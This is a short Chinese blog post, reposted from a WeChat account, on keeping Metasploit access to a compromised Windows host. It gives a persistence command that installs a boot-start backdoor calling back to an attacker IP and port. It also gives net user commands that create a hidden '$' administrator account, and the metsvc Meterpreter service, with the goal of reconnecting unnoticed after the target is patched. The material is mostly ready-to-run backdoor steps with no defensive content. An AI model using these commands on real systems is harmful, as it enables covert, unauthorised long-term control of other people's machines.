浅谈msf在渗透测试中的持久化

admin 2023年8月12日20:02:43评论26 views字数 1513阅读5分2秒阅读模式

当我们获得msf的反弹shell后,会获得一个会话后进行持续控制目标主机,可是当我们与目标主机断开连接后,想下一次继续连接目标主机,就得需要从重新配置msf以获得相应反弹。那么有什么好的方法使得我们的会话更加持久化呢?

使用persistence模块

使用persistence模块可在目标计算机上安装一个永久性后门,即使有一天目标计算机修补了漏洞,我们仍然可以通过这个连接来实现对目标计算机的控制。设计非常的银杏!

🎨常用参数:

  • -X 开机自启动
  • -i payload重连的间隔时间
  • -p 反向连接端口号
  • -r 反向连接IP地址

🎃详细帮助

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host. 
OPTIONS:
     -A        Automatically start a matching exploit/multi/handler to connect to the agent    
     -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.    
     -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.    
     -S        Automatically start the agent on boot as a service (with SYSTEM privileges)    
     -T <opt>  Alternate executable template to use    
     -U        Automatically start the agent when the User logs on
     -X        Automatically start the agent when the system boots
     -h        This help menu    
     -i <opt>  The interval in seconds between each connection attempt    
     -p <opt>  The port on which the system running Metasploit is listening    
     -r <opt>  The IP of the system running Metasploit listening for the connect back

🍎示例

当我们与目标建立会话后,可以使用下面的命令:

run persistence -X -i 11 -p 8888 -r 192.168.5.88

然后用use exploit/multi/handler模块设置后进行监听即可。

创建隐藏用户

当我们获取目标主机的远程shell后,通过cmd或者migrate对系统进行注入一个隐藏账号。从而神不知鬼不觉的连接到目标主机。具体示例如下:

cmd终端(需要提权,为管理员账号运行cmd)

# 创建用户($符号,可以起到隐藏创建用户的目的)
net user test$ 123456 /add
# 将创建的用户添加到管理员组
net localgroup administrators test$ /add

通过metsvc服务

在获得会话后,可以在msf终端运行run metsvc,将会在目标主机上以Meterpreter的服务的形式注册在服务列表中,并开机自动自动。运行run metsvc -r卸载目标主机上的Meterpreter服务。当然,这一步也需要管理员的权限,同时如果目标主机安装了安全软件,在执行命令的时候可能会提示。

总结

以上便是我们在msf中常用持久化的手段。每种方法都有各自的优势和缺点,要根据实际情况选择恰当的方案。最后表哥温馨提示“渗透不规范,亲人泪两行。”

原文始发于微信公众号(kali黑客笔记):浅谈msf在渗透测试中的持久化

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月12日20:02:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   浅谈msf在渗透测试中的持久化https://cn-sec.com/archives/1946414.html

发表评论

匿名网友 填写信息